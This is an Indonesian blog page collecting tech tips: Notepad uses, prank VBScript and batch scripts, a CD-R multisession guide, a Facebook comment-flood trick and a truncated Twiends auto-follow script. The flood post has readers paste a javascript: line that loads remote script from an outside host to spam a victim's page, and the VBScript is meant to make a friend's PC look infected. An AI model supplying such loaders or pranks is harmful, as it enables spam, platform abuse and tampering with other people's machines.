hover animation preload

Kelebihan Notepad
by dhanz ramadhan in ,

Kelebihan Notepad. Salah satu fasilitas yang dimiliki oleh windows yang paling ku sukai adalah notepad. Selama ini diriku menulis artikel yang ada di blog ini dengan menggunaken notepad. Gak tahu kenapa kalau menggunakan notepad, seolah-olah ide yang ada dalam kepala ini mengalir dengan lancar seperti air.

Beda halnya kalau menggunaken Microsoft Word, walaupun fiturnya 100, 200, 300, 400, atau bahkan 500 kali lebih lengkap daripada notepad, tapi diriku gak terlalu suka menggunakannya jika ingin menuangken ide atau gagasan menjadi sebuah artikel yang menarik. Word hanya ku gunakan jika membuat surat, pekerjaan administrasi, tugas kuliah dll yang menuntut adanya standar tersendiri.


Menurut saya yang menarik dari notepad ini adalah tampilannya yang simple, apa adanya dan fitur yang ada memang yang paling sering digunakan, mudah, cepat dan segudang kepraktisan lainnya yang ga didapatken di microsoft word. Bagi para pembuat virus, notepad juga bisa digunaken sebagai senjata pembuat virus, walaupun gak semumpuni jika menggunakan program lainnya seperti Visual Basic, Pascal dll, tapi virus hasil produksi notepad ini juga lumayan ganas.


Selain itu, jika sedang ga menggunaken komputer pribadi, alias pakai komputer warnet, kampus, temen dan semacamnya, notepad ini sering ku gunakan untuk menyimpan catatan singkat seperti password, kode2 html, dll..Sebenarnya manfaat dari notepad banyak . Berikut hasil googling ku tentang kegunaan notepad :


  1. Notepad sebagai digital diary – Anda dapat menggunakan notepad diary digital dan secara otomatis memasukkan tanggal dan informasi waktu untuk setiap baris yang Anda ketik di notepad
  2. Notepad sebagai HTML Stripper – idealnya teks pada halaman sebuah web yang diformat khusus untuk jenis font, warna, ukuran, elemen desain dan gambar. Dengan notepad Anda dapat menggunakan untuk mengedit komponen teks nya saja. Anda tinggal mengcopy dari kode HTML dan Anda paste di notepad yang kemudian dapat Anda simpan untuk digunakan lagi di lain waktu.
  3. Notepad sebagai penghemat biaya Mencetak - Anda dapat menyalin sebuah dokumen yang besar tetapi terdapat banyak sekali elemen-elemen gambar dimana yang Anda butuhkan hanya tulisan teks saja. Dimana Anda dapat mengirit dari segi tinta, kertas dan tentu saja uang Anda.
  4. Notepad sebagai HTML Creator – Notepad dapat Anda gunakan untuk membuat sebuah file / halaman website. Dengan mengetikkan perintah dasar HTML kemudian menyimpannya dengan ekstension .html Anda sudah mempunyai 1 file halaman website.
  5. Notepad sebagai pembuat script baik maupun script jahat – Notepad merupakan editor teks yang sederhana yang dapat digunakan untuk membuat script yang kompleks. Anda dapat membuat script yang jahat seperti script memformat harddisk maupun script untuk menshutdown PC Anda.
  6. Notepad sebagai Teks Replacer – Notepad dapat digunakan Anda untuk mengganti sebuah kata di dalam suatu tulisan. Misal Anda ingin mengganti kata ‘Microsoft’ engan kata ‘Yahoo’, Anda bisa mengcopy tulisan Anda di notepad kemudian untuk mengganti Anda tekan Ctrl + H
  7. Notepad sebagai Jalan Pintas Windows Explorer – Terkadang ada beberapa file yang tidak dapat dihapus. Anda dapat mencoba menggunakan notepad sebagai jalan pintas pengganti windows explorer untuk menghapus file tersebut. Anda bisa mencoba File > Open > pada type file pilih All. Anda tinggal mencari file yang ingin dihapus. Mungkin berhasil!
  8. Notepad sebagai aplikasi yang terkadang lucu – Notepad juga satu aplikasi yang lucu karena kurang sempurna. Coba Anda buka file notepad kemudian ketikkan this app can break. Setelah Anda simpan silahkan buka file tersebut, ada sesuatu yang hilang bukan?
  9. Notepad sebagai alat kreatif desainer – Notepad terkadang dapat digunakan untuk mendesain dengan berbasis teks. Silahkan Anda coba ketikkan Q33N, format dengan ukuran 72px, jenis font Wingdings. Dan hasilnya dapat rekan semua lihat sendiri.

Contoh beberapa kelebihan Notepad :


1.Membuat Ketikkan keyboard menjadi tidak beraturan,seperti ulah virus.script seperti ini sangat cocok bagi kamu yang suka isengin komputer temen yang lain.seakan-akan seperti terinfeksi virus,padahal hanyalah pembubuhan script VBScript.Ketikkan script berikut pada notepad-pilih all files-save as-apasaja.vbs.kemudian klik dua kali untuk menjalankan aplikasi iseng ini.selanjutnya buka aplikasi untuk mengetik.seperti word,excel,dll.untuk menghentikannya,buka Task Manager(Ctrl+Del+Alt),matikan WScript.selesaii…
Set wshShell =wscript.CreateObject(“WScript.Shell”)

do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop
2.Membuat Aplikasi DOS seperti Lampu Disco dengan Notepad.caranya: copy script di bawah ini pada notepad dengan nama “apa saja.bat” (tanpa tanda petik).
@echo off

title Untitled – Notepad
color f0
title NOTEPAD
mode 20,2
msg * Untuk hasil yang lebih Maximal, Klik 2 kali di title “NOTEPAD”
echo PRESS “ENTER” NOW
pause>nul
mode con: cols=1 lines=1 >nul
mode con: cols=2 lines=2 >nul
mode con: cols=3 lines=3 >nul
mode con: cols=4 lines=4 >nul
mode con: cols=5 lines=5 >nul
mode con: cols=6 lines=6 >nul
mode con: cols=7 lines=7 >nul
mode con: cols=8 lines=8 >nul
mode con: cols=9 lines=9 >nul
mode con: cols=10 lines=10 >nul
mode con: cols=11 lines=11 >nul
mode con: cols=12 lines=12 >nul
mode con: cols=13 lines=13 >nul
mode con: cols=14 lines=14 >nul
mode con: cols=15 lines=15 >nul
mode con: cols=16 lines=16 >nul
mode con: cols=17 lines=17 >nul
mode con: cols=18 lines=18 >nul
mode con: cols=19 lines=19 >nul
mode con: cols=20 lines=20 >nul
mode con: cols=21 lines=21 >nul
mode con: cols=22 lines=22 >nul
mode con: cols=23 lines=23 >nul
mode con: cols=24 lines=24 >nul
mode con: cols=25 lines=25 >nul
mode con: cols=26 lines=26 >nul
mode con: cols=27 lines=27 >nul
mode con: cols=28 lines=28 >nul
mode con: cols=29 lines=29 >nul
mode con: cols=30 lines=30 >nul
mode con: cols=31 lines=31 >nul
mode con: cols=32 lines=32 >nul
mode con: cols=33 lines=33 >nul
mode con: cols=34 lines=34 >nul
mode con: cols=35 lines=35 >nul
title N
mode con: cols=36 lines=36 >nul
mode con: cols=37 lines=37 >nul
mode con: cols=38 lines=38 >nul
title NO
mode con: cols=39 lines=39 >nul
mode con: cols=40 lines=40 >nul
mode con: cols=41 lines=41 >nul
title NOT
mode con: cols=42 lines=42 >nul
mode con: cols=43 lines=43 >nul
mode con: cols=44 lines=44 >nul
title NOTE
mode con: cols=45 lines=45 >nul
mode con: cols=46 lines=46 >nul
mode con: cols=47 lines=47 >nul
title NOTEP
mode con: cols=48 lines=48 >nul
mode con: cols=49 lines=49 >nul
mode con: cols=50 lines=50 >nul
title NOTEPA
mode con: cols=51 lines=51 >nul
mode con: cols=52 lines=52 >nul
mode con: cols=53 lines=53 >nul
title NOTEPAD
mode con: cols=54 lines=54 >nul
mode con: cols=55 lines=55 >nul
mode con: cols=56 lines=56 >nul
title NOTEPAD D
mode con: cols=57 lines=57 >nul
mode con: cols=58 lines=58 >nul
mode con: cols=59 lines=59 >nul
title NOTEPAD DIS
mode con: cols=60 lines=60 >nul
mode con: cols=61 lines=61 >nul
mode con: cols=62 lines=62 >nul
title NOTEPAD DISC
mode con: cols=63 lines=63 >nul
mode con: cols=64 lines=63 >nul
mode con: cols=65 lines=64 >nul
title NOTEPAD DISCO
mode con: cols=66 lines=65 >nul
mode con: cols=67 lines=66 >nul
mode con: cols=68 lines=67 >nul
title NOTEPAD DISCO by : bisnis-7an.blogspot.com
mode con: cols=69 lines=68 >nul
mode con: cols=70 lines=69 >nul
mode con: cols=71 lines=70 >nul
title NOTEPAD DISCO by : bisnis-7an.blogspot.com
mode con: cols=72 lines=71 >nul
mode con: cols=73 lines=72 >nul
mode con: cols=74 lines=73 >nul
title NOTEPAD DISCO by : bisnis-7an.blogspot.com
mode con: cols=75 lines=74 >nul
mode con: cols=76 lines=75 >nul
mode con: cols=77 lines=76 >nul
title NOTEPAD DISCO by : bisnis-7an.blogspot.com
mode con: cols=78 lines=78 >nul
mode con: cols=79 lines=79 >nul
mode con: cols=80 lines=80 >nul
title NOTEPAD DISCO by : bisnis-7an.blogspot.com
mode con: cols=81 lines=81 >nul
mode con: cols=82 lines=82 >nul
mode con: cols=83 lines=83 >nul
title NOTEPAD DISCO by : bisnis-7an.blogspot.com (fajar)
mode con: cols=84 lines=84 >nul
mode con: cols=85 lines=85 >nul
mode con: cols=86 lines=86 >nul
mode con: cols=87 lines=87 >nul
mode con: cols=88 lines=88 >nul
mode con: cols=89 lines=89 >nul
mode con: cols=90 lines=90 >nul
mode con: cols=91 lines=91 >nul
mode con: cols=92 lines=92 >nul
mode con: cols=93 lines=93 >nul
mode con: cols=94 lines=94 >nul
mode con: cols=95 lines=95 >nul
mode con: cols=96 lines=96 >nul
mode con: cols=97 lines=97 >nul
mode con: cols=98 lines=98 >nul
mode con: cols=99 lines=99 >nul
mode con: cols=101 lines=100 >nul
mode con: cols=102 lines=100 >nul
mode con: cols=103 lines=100 >nul
mode con: cols=104 lines=100 >nul
mode con: cols=105 lines=100 >nul
mode con: cols=106 lines=100 >nul
mode con: cols=107 lines=100 >nul
mode con: cols=108 lines=100 >nul
mode con: cols=109 lines=100 >nul
mode con: cols=110 lines=100 >nul
mode con: cols=111 lines=100 >nul
mode con: cols=112 lines=100 >nul
mode con: cols=113 lines=100 >nul
mode con: cols=114 lines=100 >nul
mode con: cols=115 lines=100 >nul
mode con: cols=116 lines=100 >nul
mode con: cols=117 lines=100 >nul
mode con: cols=118 lines=100 >nul
mode con: cols=119 lines=100 >nul
mode con: cols=120 lines=100 >nul
mode con: cols=121 lines=100 >nul
mode con: cols=122 lines=100 >nul
mode con: cols=123 lines=100 >nul
mode con: cols=124 lines=100 >nul
mode con: cols=125 lines=100 >nul
mode con: cols=126 lines=100 >nul
mode con: cols=127 lines=100 >nul
mode con: cols=128 lines=100 >nul
mode con: cols=129 lines=100 >nul
mode con: cols=130 lines=100 >nul
mode con: cols=131 lines=100 >nul
mode con: cols=132 lines=100 >nul
mode con: cols=133 lines=100 >nul
mode con: cols=134 lines=100 >nul
mode con: cols=135 lines=100 >nul
mode con: cols=136 lines=100 >nul
mode con: cols=137 lines=100 >nul
mode con: cols=138 lines=100 >nul
mode con: cols=139 lines=100 >nul
mode con: cols=140 lines=100 >nul
mode con: cols=141 lines=100 >nul
mode con: cols=142 lines=100 >nul
mode con: cols=143 lines=100 >nul
mode con: cols=144 lines=100 >nul
mode con: cols=145 lines=100 >nul
mode con: cols=146 lines=100 >nul
mode con: cols=147 lines=100 >nul
mode con: cols=148 lines=100 >nul
mode con: cols=149 lines=100 >nul
mode con: cols=150 lines=100 >nul
mode con: cols=151 lines=100 >nul
mode con: cols=152 lines=100 >nul
mode con: cols=153 lines=100 >nul
mode con: cols=154 lines=100 >nul
mode con: cols=155 lines=100 >nul
mode con: cols=156 lines=100 >nul
mode con: cols=157 lines=100 >nul
mode con: cols=158 lines=100 >nul
mode con: cols=159 lines=100 >nul
mode con: cols=160 lines=100 >nul
msg * selamat berdisco
:1
color 10
color 20
color 30
color 40
color 50
color 60
color 70
color 80
color 90
color A0
color B0
color C0
color D0
color E0
color F0
goto 1
@exit

3.Bahan Design Classic.Caranya : kopi script di bawah ini pada Notepad,kemudian pilih format-font-wingding/wingding2/wigding3.secara otomatis akan berubah menjadi icon-icon menarik dan siap di jadikan bahan design.hmmm..menarik bukan..???.
1234567890-=

!@#$%^&*()_+qwertyuiop[]\
asdfghjkl;’
zxcvbnm,./
QWERTYUIOP{}|ASDFGHJKL:”
ZXCVBNM<>?


Sedikit trik-trik dari notepad.referensi ini saya ambil dari beberapa web blog dan semua trik yang saya ketahui tentang notepad.

Sumber
Comments (3)

Cara agar CD R dapat dipergunakan menyimpan data berulangkali
by dhanz ramadhan in ,

Sebelum diluncurkan flashdisk, salah satu media penyimpanan data selain disket adalah menggunakan compact disc ( CD ). CD ini memiliki kelebihan daripada disket. Selain tidak mudah rusak, CD ini juga memiliki kapasitas yang jauh lebih besar daripada disket yaitu sekitar 650 – 700 MB. Saat ini disket sudah jarang dipergunakan, bahkan hampir tidak pernah. Compact disc (CD) ini terdapat dua macam yaitu CDR ( Compact Disc Recordable ) yang hanya dapat dipergunakan untuk menyimpan saja dan CDRW (Compact Disc ReWritable) yang dapat dipergunakan untuk menyimpan dan juga dapat menghapus file yang telah disimpan kemudian untuk menyimpan file/data lagi sehingga CDRW ini bisa dipergunakan berkali-kali seperti layaknya flashdisk.

Berbeda dengan CDRW yang dapat diisi dan dihapus secara berulang-ulang, CDR ini hanya bisa digunakan untuk menyimpan saja. Ketika kita menyimpan data dengan volume kecil ke CDR, maka CD tersebut sudah tidak bisa dipergunakan untuk menyimpan data lagi. Sehingga sangat tidak efisien. Kita bisa menyiasati agar CD R dapat digunakan untuk menyimpan data atau file berulang kali, jadi bisa lebih irit dan efisien. Program yang biasa dipergunakan untuk burning data ke CD adalah program Nero. Untuk itu trik agar cdr bisa dipergunakan berulang kali ini menggunakan program Nero saja.
  1. Seperti biasa buka dulu program Nero
  2. Pilih Data kemudian klik Make Data CD

  3. Masukkan data atau file yang akan burning ke CD dengan klik tombol Add dan jika sudah semua klik Next
  4. Pada jendela Final Burn Settings aktifkan atau beri tanda centang pada pilihan Allow files to be added later (Multisession disc). Dengan mengaktifkan fitur ini maka CD R shobat akan bisa digunakan untuk menyimpan data lain di waktu yang lain pula.

  5. Klik Burn.
Dengan demikian jika masih ada ruang pada CDR, maka kita bisa menambahkan data atau file ke CDR tersebut, jadi bisa lebih irit mengingat harga CDR sangat jauh lebih murah ketimbang CDRW.
Comments (1)

Flood komentar di facebook!!
by dhanz ramadhan in ,


cuman mau ngasih tau tentang cara ngeflood komentar di FB.
syaratnya :

  • harus udah login ke FB dong
  • target harus bisa dikomentarin, nggak harus friend yang penting bisa berkomentar.
  • posisi halaman yang kebuka.. cuman nongol 1 form komentar, kalo di wall kan form komentar bisa nongol banyak banget . misal di bagian foto, nah itu kan cuman ada 1 form komentar, berarti trik ini bisa dijalankan
stepnya :
  1. copas script ini di url korban, trus tekan [enter] di keyboard agan.
    javascript:(a = (b = document).createElement("script")).src = "//brk.to/flood", b.body.appendChild(a); void(0);
  2. masukkan jumlah komen
  3. masukkan kalimat komentarnya
  4. tunggu kira2 1-10 menit (tergantung jumlah komen + koneksi agan)
  5. bisa dicek dengan refresh langsung atau buka tab baru.
Video Demo-nya nih gan http://megaswf.com/file/1007793

Sumber
Comments (0)

[Twitter] JAVAscript Twiends Auto-follow - Jadi ARTIS dadakan dgn FOLLOWER bejibun
by dhanz ramadhan in


sebagian dari agan mungkin sudah pernah menggunakan twiend.com untuk mencari following twitter ataupun mencari teman yang banyak untuk FB fan pages.
kalau ada agan yang belum tahu, nihh ane kasi tahu caranya gan..
simple banget :)
  • join twiends.com
  • setting FB and twitter agan di twiends
  • setelah setting semua account pada twiends.com. silahkan menujut ke url berikut ini
  1. http://twiends.com/twitter/all
  2. http://twiends.com/twitter/country
pilih salah satu aja ya gan no 1 atau 2. setelah di klik linknya, paste kode java berikut pada menu browser, kemudian enter.

Kode:
javascript: /* nemsis 4 bhw */ function tr_f() { var followlinks = []; for (var i=0; i < document.links.length; i++) {if (document.links[i].getAttribute("class")=="follow"){followlinks[followlinks.length] = document.links[i];}} /* nemsis 4 bhw */ for (var i=0; i
Sumber
Comments (1)